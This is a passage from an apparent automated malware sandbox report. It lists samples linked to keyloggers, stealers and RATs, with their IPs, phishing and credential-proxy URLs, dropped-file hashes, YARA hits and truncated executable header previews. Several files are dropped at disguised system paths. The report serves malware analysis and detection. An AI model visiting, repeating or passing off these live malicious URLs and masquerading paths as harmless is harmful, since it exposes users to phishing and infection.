	new order.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Document.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	http://ava.game.naver.com.sg.ryo.biz.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://www.levada.ru/2024/05/16/konflikt-s-ukrainoj-massovye-otsenki-aprelya-2024-goda/	Get hash	malicious	Unknown	Browse	149.154.167.99
	TRE87656789000.bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SOA July Payment.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order PO11420.docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REVISED UPDATE424 PO.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
CLOUDFLARENETUS	http://telstra-104348.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://ebay38.cc/	Get hash	malicious	Unknown	Browse	172.67.195.180
	http://tok2np0ckht.top/	Get hash	malicious	HTMLPhisher	Browse	104.18.24.93
	http://35-ghf4g44.mytechguards.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://telegxawm.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://ava.game.naver.com.sg.ryo.biz.id/	Get hash	malicious	Unknown	Browse	172.67.173.192
	https://nym1-ib.adnxs.com/click2?e=wqT_3QKZAfBDmQAAAAMAxBkFAQiIoM-zBhCJo_aKxfvCoioYgeDOtoOlx-YOIIy_9g4omAIwuGg4kQRAuq2d7gFI8opOUABaA1VTRGIBBYhoAXABeJmgZ4ABAIgBAZABApgBBaABAqkBNzgR_dr64z-xAREKLLkBAAAAQDMz_z_BAREUAMkVChzYAY69AuABAA../s=fd215fa3f6c45164ae9790e4c04714dce2356091/bcr=AAAAAAAA8D8=/pp=0.62/bn=0/clickenc=//lilypet.com.br/rarr/jhfhnfknf/aWFuLnJvZ2Vyc0BsbWcubmV0	Get hash	malicious	EvilProxy	Browse	172.67.74.152
	https://banc.my.site.com/login?c=ZYrHywz6_hUlMaLTq7yANGaWrFtU7WNMxvT588Ncq6E3EW0F49R00yKaOHj_pxG8IStDNBdWzFe2n1WxBmAMJMyQtF_2W6XAwnXQ9MMgMQ41u__8HKlI7IF0a3bkEu9CgoUiNbteevKCtijEBGcHHhHBrV6zcfFhZq708qKbglaE7LUwo1sL0LiKmbMaLcsCSwV4YpwIxcBUmxSaqJVUUQD4rCQhLA%3D%3D	Get hash	malicious	Unknown	Browse	104.18.86.42
	http://email.trumpdigitaltradecards.com	Get hash	malicious	Unknown	Browse	172.67.140.207
	http://77.90.38.170/sos.txt	Get hash	malicious	Unknown	Browse	1.1.1.1
TUT-ASUS	HnvcpgZOtM.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	7ICY2krDqo.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	jyz52R1C6Y.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	jigm8567e0.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VfoanAPxNA.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	JzWHmWfXBX.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	qaaf5QSSPk.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	52i8S0bosh.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL INVOICE_99765.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Mozilla Firefox\dwm.exe	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Program Files\Mozilla Firefox\dwm.exe	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Program Files\Google\Chrome\updater.exe	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse
	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (797), with no line terminators
Category:	dropped
Size (bytes):	797
Entropy (8bit):	5.904114605977836
Encrypted:	false
SSDEEP:	12:OdWv7Rs9KP/jVgTT5GtmOOwnU+u/IAUxPpIRJpYrAjsRvhIuAoxnI2/3CqzEJ:OsEKG+aIJopYUAN1AohVpQ
MD5:	F0730A8D9240CE5098D02C1F442DE4D9
SHA1:	F56016CED691285DAF185DC44873B39FFA08BF78
SHA-256:	3C10AFB7E4C5BC9AB1E8B91906B36ED9CD52459B310EDD6FB9BD501634FF0A23
SHA-512:	0B163CC9A3E9A743E985E3690B2B1A0739866C6ACC8066698568F9BEEF916E6FCB97C80A7877836699F66300DFBA9DE536F57904DD490033DA186933031C7A4B
Malicious:	false
Preview:	SZjUPqm0MRr8hqbgMKVYyjDtEXmVD43kJGEfTfAhMKPkoy1alUMx5c8sVzP2ERwRXGzbm6MqJxMoTdFQgLttrGoqHVJePId4X7Mh8ZypHfnIQTZ1t8V2iDkRbJURwsbBTRRVQiRHXElLcgZx5SuQwkWTX5FzFg2ZEmy9CDkLrOfecYy5tgVe7KOt577VccB0LMHzrav2rjjiF219GKGiLXb4YFDEGPtOMpSPQ9NTvdxXkpnDG7OSWdoxuMbmWqwc0UWZjlsH6wxskDTsbA7IBb2tAefDil6ErVhPTOdfPGVjp6Nq3sKVtobZcmYFFpjV0tBPgDZNhb34GTDERzKzakVC3IxqzXZjg9t647JzT7yRugTIjUyQet5PY8VYQsXJCTXGkHJTpVgcwDSXypHfjJFxDdh6mvikkoPbIMibKelINccUq8jlk1j2NkDGjNr3w52Hy0OmGqVFh6jlANQoL79sFWOiJb17xrVSjVg0t7e4geUQBcFW6Crz5KCblqcoyXRzlRBpqZ4OdFLkB7hrWeAuAgWZTEODezFINepuaaphIdW08bZoIvSTXgzE4lWmL1un9DXgSxQ6zdmgKga1ok4shvurokzzEDVQts05E2VVfWe43T3XLe7l6BFNSq1r7b1vHVxbqexvOiMKR0xVrcnjFuUrnmnYAoYEeswhfcrqrLWYy46b2gAfxSpXBFyD1YukKHqiEQ0Ou724X52sqLgen3RMCYfZnnySawOqOYXmpvu0ZvAFNGXq2Q6Q0efpuakHIkdlrLdSx3y2IawRYZMhQIZKz

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files\Mozilla Firefox\6cb0b6c459d5d3

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.773557262275185
Encrypted:	false
SSDEEP:	3:lrEc:lf
MD5:	A3DC382A742E16CD3332B1E5DCB84D79
SHA1:	2032EDA0B1764238E73B8F8953032FC8D06DBC19
SHA-256:	4ED7F0E3F6DD4C4FB63D1E61CB13507BFD100913C6B736408921BFDCC295B885
SHA-512:	49F7BA0FE4A39CFBE3FCA266BDA1B4F9698DF503E3330001C1D583971578B9CDF76E6448B2556027D0F37038D9C2210CF4FEAA01FD6AA7A2FDB1C8A4E654E67C
Malicious:	false
Preview:	LpnDWo4sy2byP6u

C:\Program Files\Mozilla Firefox\dwm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\dwm.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\dwm.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\ProgramData\Microsoft\based.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6127126
Entropy (8bit):	7.9895412495725076
Encrypted:	false
SSDEEP:	98304:J5+ki65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF0FeLkg4ke4U7Fj6:JUCDOYjJlpZstQoS9Hf12VKX9FeLwkys
MD5:	838A5BD59DE32F425938CBA6C119CBEE
SHA1:	3A789DD47202C524F4C10CF37B245174CF02A2F1
SHA-256:	75AFAAE3D0FBA0ECB6E25BE065B68A7D199186714DC6C615311491E66B781FA9
SHA-512:	71B38A9C2BD5A62F01B4B78B4CFCE368977E0A0945372BD33779FE5248E44A0FB1EEC015EFEB13FE3A057D80D20435B9AE04FB3D059E0F3BB525E44A19E268B0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...[..f.........."....(.....l.................@......................................]...`.................................................l...x.......4....`..."...Y].H$......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...4...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\hacn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11662615
Entropy (8bit):	7.996772653002528
Encrypted:	true
SSDEEP:	196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
MD5:	FC445049713C02F9A9DDAA62E404C9E9
SHA1:	8BCFA380451D9B71B4933E28C9FFB6710D12323E
SHA-256:	B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
SHA-512:	14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4042529
Entropy (8bit):	7.700603596238004
Encrypted:	false
SSDEEP:	98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
MD5:	45C59202DCE8ED255B4DBD8BA74C630F
SHA1:	60872781ED51D9BC22A36943DA5F7BE42C304130
SHA-256:	D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
SHA-512:	FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Recovery\cc11b995f2a76d

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (804), with no line terminators
Category:	dropped
Size (bytes):	804
Entropy (8bit):	5.876714645231957
Encrypted:	false
SSDEEP:	24:St6kYJy7liBUWXVjSrpzg3yEq1JBoLd1Iv0Q:6eklkHF2ruBAGd187
MD5:	4A683BC796B829A908187BF3782B94A1
SHA1:	15997C7EED3337FB959F8BBD2483B5579B2C519F
SHA-256:	C6ED4D6441C9A454117CEAEEEF137FCAA7059DF7B5914A4D62854B3ED493BCC4
SHA-512:	2EFB5189EF1BEDC826BCB4E753E1A47C183B3FC5FBF1A604159F8A543A1854E64B91F5F52479CB41687CF896A509085A39E3534F6D3BE3BC7B0EF79C7318C5C8
Malicious:	false
Preview:	96M2yAu46Ivd7NyEAClbcPW6Uk2EX9j2J70D3L7k2kD3FHOfuVugVrVtjPiNIqh7i2UAWvKyFBi1Md0NWWTCPDhblGdonubMDGUNwNJ8K5aTIdhFYU0vWfreU2YPSgLVjWyFInaINV1TmOSHjXPS3q0iY033y3qouFtwpb7v3rhBnY2GkQq4Q2b3gQrSthUUoNjgegcHaeYLIy4A7wTiMwY1o0QYuoBWXNWazVmDyjdvdQurVrU6NvH2yr2oQDWwcCx4ceLmKQunSmXXFiCDTEIlFelHc7xuMrSbc0P1gsv7BejLTeirBTcX3Ly72DJMc9akU64PTLhlSLjl4ay8ZFt2P4iQBR9cjieCD81XjTYzw1ErmNDcPLxXQhVZXnOCLEBuqhh5iaYGr3GXz0oxOhNYvGvfnc95FWorzUAEpH3ywrqXa8jg9axo1n8jwCSFbcAUOZie0kIGnYlDaXEp3c6oiAzLWaRnzxXUqVIBZEqYRrAcC4JY7nM8fWwOjWIZSfRzBQXEPDPywiW09XIbR3pLkZzUj3bD5RFwaKbwhEI3YYL795PMNrHZzFOlbCfVlM2ecjay5W3MuvxMN1VnoPzOKq7U60UfixSLfreZfaQ0x4oDRCXjq2qWXnUvmF2FCYo7dlrgX6HN88bPC4C4cuyqG6y1WtwZiLyZQrjqU1MuucXYMEtrC8nRj70hwzJnJrpxJC9UUWjliE5oiapS9FWkihzS1C3erikCxkOJEYWqYBsfCM8WK1oEVFOmNrdSdE39d218LfNlsqLgyUPpDgT04grrVm6X4ENU

C:\Recovery\e978f868350d50

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (986), with no line terminators
Category:	dropped
Size (bytes):	986
Entropy (8bit):	5.9062580396937605
Encrypted:	false
SSDEEP:	24:qQgwMT/Ct5OjSWjokxDH+rJ/kIyJKxwYWUXjHprSj2BT1Yg1P:OwMjC/2jokpHO/kdkxwbUXjHpvVTP
MD5:	927826CB91B1EFA4B55C6FE22B455D22
SHA1:	30923DAA2622BF26C36256C807E543BEC6AA0929
SHA-256:	6394934D64BA00871BD7E320D61C9843E764656E2A50DD8DC73BDA88377957A1
SHA-512:	D2257099A882D043EDAE78A69CC9AA29E06C0C0630D704DBB3E1298070FA19864D09589A363E72BF5E2318F74003B7980D596D09E38EFD52D48980A75680D1FA
Malicious:	false
Preview:	m22yockvATTQ8a6tnrDLQoq01lnIfWzR5iBN4WMtcLSnaCxQPW43aLs7MB7DycPodBVZZsyQfUtFWCZyxX3Ib61tzDA2ZJ5A5oKZrX1ghnXGcnlJmIPbiGMgJlkVr60WZsJr1AHafXkxivRLb1QR4dczcoPFxgylxBrte4RmAz5LfY7XTY30pjc5PTPNuCm9i9AhEhrhjnQFiRTEq2vZm75NjveKoE28M5mgXaTwrVRBSXW7ALg2QNXkDx7SDg3evS2mpxqQi9rQq34MZgKchAr8iBdkcAtKcwQAetSNeQTRfG4J2v3gVa6vk4EnTGxiQhy3n3rpN78RqZccGTrrGMyBzeZkpo3YduB8RBf8DOTYcpELbmhAYGbDswDJeHAiEjy6XeKFysn23ajKZOICH39WS7Qe7We5OuU21Ix7cbMqcjKSN3tP97bLjbnaOqHbOsnIFqSRbLkpqT4tx7QEnP6QTJSafXtwUuct5BMglbyyXveQg3mQZDx8vXz6X1vDbyV61KxvvudLaI3ioC4ludWR7d8iLPJtquWiZiZVG1eojlindRRV7JT8bE8YMPjgkufpvUIGnif38rrV4UE47xvgbYHUjBJ1R8EzG22IIKsZoZ9tWnd2Kpix89OXNyhlZnm9n2PCc6vwFW1CYX75hRrlaQ0Gne4UnGAAxAFeYaZO3vsmHM900mEI6AjXBIY7BaJ8W1OXRdhG1csoiN8bfEeBC1DwascPCcNcmtQQ7liWE7ReS5yxK7c66I6exc7jASEZPPBz7se4fH6Fkjef3pFFAQgexwdfn8Ww22OC390bchayM13N7bpVN9Y9shBLO8QhvJMsVbl4ynmczsR62PhMTAj3dOUV7oNeR3CCoK2fzvgjW6KAPFS9bENukSPGHQ6KaIL5pPRrXCWhe9ggETG2WNCNpRbW5vXjyWJOvOUAxkmZrpQkvtCyKExMF7PYx5wlowtIzSvz9FEvknfAB0kMsj

C:\Recovery\powershell.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\powershell.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\powershell.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Recovery\winlogon.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
